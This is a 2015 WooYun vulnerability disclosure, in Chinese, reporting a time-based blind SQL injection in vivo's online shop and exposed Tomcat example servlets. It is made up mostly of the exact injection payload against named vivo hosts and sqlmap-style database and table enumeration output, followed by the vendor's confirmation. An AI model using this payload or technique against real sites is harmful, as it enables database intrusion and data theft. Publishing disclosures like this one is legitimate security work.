当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119872

漏洞标题:步步高商城sql注入+后台系统问题配置(dba权限获取数据库大量信息)

相关厂商:vivo智能手机

漏洞作者: 人丑嘴不甜

提交时间:2015-06-12 15:01

修复时间:2015-07-31 20:02

公开时间:2015-07-31 20:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-12: 细节已通知厂商并且等待厂商处理中
2015-06-16: 厂商已经确认,细节仅向厂商公开
2015-06-26: 细节向核心白帽子及相关领域专家公开
2015-07-06: 细节向普通白帽子公开
2015-07-16: 细节向实习白帽子公开
2015-07-31: 细节向公众公开

简要描述:

后台系统问题配置 和基于时间的盲注 dba权限 几乎跑遍全图

详细说明:

后台系统问题配置
http://supply.vivo.com.cn/examples/servlets/servlet/SessionExample;jsessionid=C44A64DEDD77CF24847E5919542A2DCE
/examples/servlets/servlet/SessionExample
Apache Tomcat version older than 6.0.36
版本过低
http://pop.vivo.com.cn/examples/servlets/servlet/SessionExample
pop.vivo.com.cn/loginOn.action
注入点

Place: POST
Parameter: cat_id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cat_id=22) AND SLEEP(5) AND (6138=6138&orderBy=1,(select case when
(3*2*1=6 AND 000144=000144) then 1 else 1*(select table_name from
information_schema.tables)end)=1&showtype=list&&virtual_cat_id=
---
[10:59:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0.11
current database: 'vivo_swore'
Database: vivo_swore
[84 tables]
+-------------------------------------------------+
| Ansicht1 |
| LOCATION |
| LT_JURISDICAO |
| MM_USUARIOS_DO_PROCESSO |
| News |
| Organization |
| PostalAddress |
| Property |
| Publication |
| QRTZ_FIRED_TRIGGERS |
| QRTZ_SIMPLE_TRIGGERS |
| Regions |
| SCRIPT |
| SPJ |
| SubCategory |
| TIL_IDIOTON |
| basePlusCommissionEmployees |
| be_users |
| belong |
| binn_forum_threads |
| cdb_activities |
| child_config_traffic_selector |
| countries |
| dependent |
| div_passport |
| dtb_customer_mail_temp |
| dtb_customer_reading |
| edge |
| enseignant |
| exchangerate |
| ezin_roles |
| form_data_archive |
| forum_user_activity |
| friend |
| games |
| geo_Island |
| geo_sea |
| guava_group_assignments |
| gws_page |
| invoice |
| isDeleted_table |
| isMember |
| jforum_categories |
| jforum_topics |
| job_history |
| jos_banner |
| jos_session |
| jos_vm_module |
| jos_weblinks |
| loan |
| locatedOn |
| log |
| logins |
| mailaddresses |
| nuke_comments |
| nuke_links_newlink |
| nuke_stats_year |
| oil_phocadownload_categories |
| oil_phocadownload_settings |
| osc_products_attributes_download |
| osc_products_options_values_to_products_options |
| pagelinks |
| pages |
| pg_ts_dict |
| phpbb_themes_name |
| phpbb_topics |
| power |
| problem |
| rating_track |
| spip_auteurs_messages |
| store1 |
| tbl_member |
| tbl_works |
| tblblogentriescategories |
| tbnguoidung |
| triggers_template |
| user_un |
| useraccount |
| useraccounts |
| users |
| vcd_Images |
| vcd_RssFeeds |
| wh_der_children |
| xplay3s |
+-------------------------------------------------+
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0.11
[20:55:20] [INFO] fetching tables for database: 'vivo0307'
[20:55:20] [INFO] fetching number of tables for database 'vivo0307'
[20:55:20] [INFO] resumed: 171
[20:55:20] [INFO] resumed: sdb_aftersales_return_product
[20:55:20] [INFO] resumed: sdb_apiactionlog_apilog
[20:55:20] [INFO] resumed: sdb_b2c_brand
[20:55:20] [INFO] resumed: sdb_b2c_cart
[20:55:20] [INFO] resumed: sdb_b2c_cart_objects
[20:55:20] [INFO] resumed: sdb_b2c_college
[20:55:20] [INFO] resumed: sdb_b2c_comment_goods_point
[20:55:20] [INFO] resumed: sdb_b2c_comment_goods_type
[20:55:20] [INFO] resumed: sdb_b2c_contract_package
[20:55:20] [INFO] resumed: sdb_b2c_contract_package_numbers
[20:55:20] [INFO] resumed: sdb_b2c_counter
[20:55:20] [INFO] resumed: sdb_b2c_counter_attach
[20:55:20] [INFO] resumed: sdb_b2c_coupon_map\x11
[20:55:20] [INFO] resumed: sdb_b2c_coupon_vivo
[20:55:20] [INFO] resumed: sdb_b2c_coupon_vivo_info
[20:55:20] [INFO] resumed: sdb_b2c_coupon_vivo_list
[20:55:20] [INFO] resumed: sdb_b2c_coupon_vivo_xshot
[20:55:20] [INFO] resumed: sdb_b2c_coupons
[20:55:20] [INFO] resumed: sdb_b2c_delivery
[20:55:20] [INFO] resumed: sdb_b2c_delivery_items
[20:55:20] [INFO] resumed: sdb_b2c_dly_h_area
[20:55:20] [INFO] resumed: sdb_b2c_dlycorp
[20:55:20] [INFO] resumed: sdb_b2c_dlytype
[20:55:20] [INFO] resumed: sdb_b2c_flashlottery_award
[20:55:20] [INFO] resumed: sdb_b2c_flashlottery_log
[20:55:20] [INFO] resumed: sdb_b2c_flashlottery_winner
[20:55:20] [INFO] resumed: sdb_b2c_goods
[20:55:20] [INFO] resumed: sdb_b2c_goods_cat
[20:55:20] [INFO] resumed: sdb_b2c_goods_contract_package
[20:55:20] [INFO] resumed: sdb_b2c_goods_keywords
[20:55:20] [INFO] resumed: sdb_b2c_goods_lv_price
[20:55:20] [INFO] resuming partial value: sdb_b2c_goods_promotion

漏洞证明:

QQ图片20150604131816.png

QQ图片20150604131841.png

QQ图片20150604131816.png

11.png

QQ图片20150611151047.png

QQ图片20150611205356.png


查看权限dba

QQ图片20150611211118.png

修复方案:

辛苦你们了

版权声明:转载请注明来源 人丑嘴不甜@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-16 20:01

厂商回复:

感谢提醒和关注

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-16 20:58 | 人丑嘴不甜 ( 路人 | Rank:28 漏洞数:8 | 小菜鸟 妄想成为大大的大牛)

    为什么 还是这么少? 这还是小厂商吗?只给我4rank???